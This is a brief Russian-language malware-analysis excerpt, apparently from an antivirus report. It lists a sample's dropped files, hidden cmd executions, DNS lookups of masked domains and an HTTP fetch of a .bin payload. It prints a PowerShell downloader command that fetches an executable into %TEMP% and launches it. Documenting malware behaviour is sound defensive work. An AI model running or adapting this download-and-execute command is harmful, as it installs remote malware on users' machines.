Техническая информация
- $dhzr4 как %temp%\kiddtw_c.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Qltr4([String] $Dhzr4){(New-Object System.Net.WebClient).DownloadFile($Dhzr4,''%TEMP%\kiddtw_c.exe'');Start-Process ''%TEMP%\kiddtw_c.exe'';}try{Qltr4(''ht...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1376
- %TEMP%\sgjxozjl-9.bat
- %TEMP%\1108075.cvr
- 'ba###teks.com':80
- http://ba###teks.com/loktares.bin
- DNS ASK ch####hinenow.com
- DNS ASK ba###teks.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Qltr4([String] $Dhzr4){(New-Object System.Net.WebClient).DownloadFile($Dhzr4,''%TEMP%\kiddtw_c.exe'');Start-Process ''%TEMP%\kiddtw_c.exe'';}try{Qltr4(''ht...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\sgjxozjl-9.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\sgjxozjl-9.bat" "